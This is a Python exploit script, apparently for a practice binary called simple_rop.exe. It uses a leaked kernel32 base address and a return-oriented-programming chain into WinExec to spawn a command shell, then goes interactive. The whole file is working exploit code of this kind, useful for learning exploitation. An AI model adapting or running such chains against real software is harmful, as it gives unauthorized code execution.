from pwintools import *

# Launch the target under the pwintools Process wrapper; the debugger hook
# stays commented out for unattended runs.
p = Process("./x64/Release/simple_rop.exe")
#p.spawn_debugger(x96dbg=True, sleep=2)

# The first line the target prints is treated as a kernel32 base-address
# leak: its last whitespace-separated token is parsed as hex.
first_line = p.recvline(False)
k32_base = int(first_line.split()[-1], 16)
log.info("kernel32.dll @ 0x{:016x}".format(k32_base))

# Offsets relative to the kernel32 image base. The data-section offset is
# hard-coded and build-specific (assumed writable — TODO confirm against the
# loaded image); the export offsets come from the process' symbol table.
k32_data_ofs = 0xA7000
k32 = 'kernel32.dll'
WinExec_ofs = p.symbols[k32]['WinExec'] - p.libs[k32]
Sleep_ofs = p.symbols[k32]['Sleep'] - p.libs[k32]  # resolved but not referenced below

"""
dll base 0x0000000180000000
0x000000018001adf3 : pop rcx ; ret
0x0000000180016e92 : pop rdx ; cmc ; add eax, 0x81108b00 ; ret 0
0x00000001800169da : mov qword ptr [rdx], rcx ; ret
"""

def w(addr, dat):
    """Return the gadget sequence that stores the 8-byte value *dat* at *addr*.

    The three gadget addresses are those listed in the string block above,
    taken from the on-disk image (base 0x180000000) and rebased onto the
    leaked runtime base ``k32_base``. Order: ``pop rdx`` <- addr,
    ``pop rcx`` <- dat, then ``mov [rdx], rcx``.
    """
    image_base = 0x0000000180000000
    pop_rdx = k32_base + (0x0000000180016e92 - image_base)
    pop_rcx = k32_base + (0x000000018001adf3 - image_base)
    mov_rdx_rcx = k32_base + (0x00000001800169da - image_base)
    return (
        p64(pop_rdx) + p64(addr)
        + p64(pop_rcx) + p64(dat)
        + p64(mov_rdx_rcx)
    )

# 0x18 bytes of filler before the chain; presumably the distance to the saved
# return address in the target's frame (build-specific — TODO confirm).
filler = "A" * 0x18

cmd_addr = k32_base + k32_data_ofs
image_base = 0x0000000180000000
pop_rcx = k32_base + (0x000000018001adf3 - image_base)
pop_rdx = k32_base + (0x0000000180016e92 - image_base)

# 1) write the NUL-padded "cmd" string into the kernel32 data area
# 2) rcx = lpCmdLine, rdx = uCmdShow (10), then return into WinExec
# 3) finish on a self-jump so the chain does not return into garbage
chain = w(cmd_addr, u64("cmd\0\0\0\0\0"))
chain += p64(pop_rcx) + p64(cmd_addr)
chain += p64(pop_rdx) + p64(10)
chain += p64(k32_base + WinExec_ofs)
chain += p64(k32_base + 0xBA90)  # jmp $

payload = filler + chain
p.send(payload)

log.info('Starting interactive mode ...')
p.interactive()